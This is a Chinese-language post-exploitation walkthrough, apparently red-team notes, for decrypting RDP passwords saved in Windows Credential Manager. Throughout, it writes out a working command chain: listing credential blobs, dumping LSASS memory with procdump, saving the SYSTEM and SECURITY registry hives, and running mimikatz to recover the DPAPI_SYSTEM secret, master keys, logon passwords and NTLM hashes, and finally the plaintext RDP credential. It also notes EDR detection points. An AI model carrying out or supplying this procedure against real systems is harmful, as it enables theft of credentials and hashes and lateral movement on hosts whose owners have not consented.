RDP 保存凭据导出（通过 DPAPI 解密 Windows 凭据管理器中保存的 RDP 凭据）
查看保存的凭据
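# List the credentials the current user has saved in Credential Manager / with cmdkey
# (RDP entries typically appear as TERMSRV/<host>).
cmdkey /list
# The DPAPI credential blobs themselves, one file per entry, named with 32 hex chars.
# /a is needed because the directory and files are hidden; the path is quoted because
# %userprofile% may contain spaces (e.g. C:\Users\John Doe), which would otherwise be
# split into two arguments.
dir /a "%userprofile%\appdata\local\microsoft\credentials\*"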
- 将 Credentials 目录下的凭据文件（文件名为 32 位十六进制，如下文的 DFBE70A7E5CC19A398EBF1B96859CE5D）复制到 mimikatz 的工作目录，后续全部离线解析
mimikatz解析凭据
# Parse the copied credential blob offline. The value to note in the output is
# guidMasterKey: it is the name of the master key file (under Protect\<SID>\) that
# protects this blob, and the steps below must use that exact file / GUID.
# privilege::debug is not required for parsing a file on disk; it is harmless here.
mimikatz "privilege::debug" "dpapi::cred /in:DFBE70A7E5CC19A398EBF1B96859CE5D" exit
导出lsass
- 下载 Procdump
- 以管理员权限运行（注意：在开启 LSA 保护 RunAsPPL 或 Credential Guard 的主机上可能失败或拿不到可用的密钥，需先确认；对 lsass 的内存转储也是常见的 EDR 告警点）
# Full memory dump (-ma) of LSASS to lsass.dmp; must be run from an elevated prompt.
# NOTE(review): with LSA protection (RunAsPPL) / Credential Guard enabled this may be
# denied or contain no usable keys — confirm on the target before relying on it.
procdump.exe -accepteula -ma lsass.exe lsass.dmp
从 lsass 转储中获取缓存的 MasterKey
- 将 lsass.dmp 复制到分析机上离线解析，避免在目标主机上再运行 mimikatz
# Load the dump offline and list the DPAPI master keys cached in LSASS for the sessions
# that were logged on (GUID -> master key). If the guidMasterKey from the dpapi::cred
# step is in this list, its key can be passed straight to /masterkey: in the final step
# and the hive / master-key-file steps below can be skipped.
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::dpapi" exit
- 导出注册表 hive（需要管理员权限）
# Offline copies of the SYSTEM hive (holds the boot key needed to decrypt LSA secrets)
# and the SECURITY hive (holds the LSA secrets, including DPAPI_SYSTEM). Both need an
# elevated prompt.
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SECURITY.hiv
- 从 hive 中离线解出 LSA secrets，取其中的 DPAPI_SYSTEM
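# Decrypt the LSA secrets from the saved hives (no live LSASS access needed).
# "log" additionally writes everything to mimikatz.log in the working directory —
# it will contain the secrets, so remove it when done.
# The value to keep is the DPAPI_SYSTEM secret; it becomes /system: in the next step.
# A trailing exit is added so mimikatz does not stay at its interactive prompt,
# consistent with the other invocations on this page.
mimikatz log "lsadump::secrets /system:SystemBkup.hiv /security:SECURITY.hiv" exit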
- 记住 lsadump::secrets 输出中 DPAPI_SYSTEM 一项的值（示例：c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3）。输出会给出 full 以及 m/u（machine/user）两个 20 字节的部分；下一步解 S-1-5-18\User 目录下的 masterkey 时用的应是 user 部分，请对照输出确认
- 解密系统 masterkey 文件（仅当凭据 blob 由 SYSTEM 账户保护、masterkey 位于 S-1-5-18 目录下时适用）
- 找到文件名等于 dpapi::cred 输出中 guidMasterKey 的文件，例如 C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\04ece708-132d-4bf0-a647-e3329269a012（目录和文件为隐藏/系统属性，需用 dir /a 查看并以管理员权限复制）。若 guidMasterKey 对应的是某个用户 SID 的目录（%appdata%\Microsoft\Protect\S-1-5-21-…），则不能用 DPAPI_SYSTEM 解密，需要该用户的密码/哈希，或直接使用 sekurlsa::dpapi 输出中同一 GUID 的 masterkey
# Decrypt the SYSTEM master key file with the DPAPI_SYSTEM secret.
# /in: is the master key file whose name equals the guidMasterKey from dpapi::cred;
# /system: is the 20-byte DPAPI_SYSTEM value from lsadump::secrets (for a key under
# S-1-5-18\User this appears to be the user half of the m/u pair — verify against that
# output). The "key" printed by this command is what /masterkey: takes in the final step.
mimikatz "dpapi::masterkey /in:04ece708-132d-4bf0-a647-e3329269a012 /system:c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3" exit
获取登录用户的密码（可选，与上面的 DPAPI 流程并列）
# Separate from the DPAPI chain above: dump the plaintext / NTLM credentials of the
# sessions that were logged on when the dump was taken.
# NOTE(review): when the credential blob belongs to a normal user (master key under
# that user's SID), the user's password or hash — not DPAPI_SYSTEM — is what is needed
# to decrypt their master key, so this output can be the missing piece.
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
解密rdp凭据
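# Decrypt the RDP credential blob with the recovered master key: the 64-byte "key"
# printed by dpapi::masterkey, or the entry for the same GUID from sekurlsa::dpapi.
# The output should show the target (TERMSRV/<host>), the user name and the plaintext
# credential. The closing quote and trailing exit close the command properly.
mimikatz "dpapi::cred /in:DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:4b0c21d9bc33c07d44ee51033a808dd4473d13798d44d3ebc40ee0ff16b56f455f4085707e57a05d88d88457c9ba835ad65e7bacf68c5e5922a0601fdd7496dd" exit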
所有文件（凭据 blob、masterkey 文件、lsass.dmp、两个 hive）都放在 mimikatz 的工作目录下，因为上面 /in:、/system:、/security: 等参数使用的是相对路径；放在别处则改用绝对路径。这些文件以及 mimikatz.log 都可直接恢复出明文凭据，用完按授权要求及时删除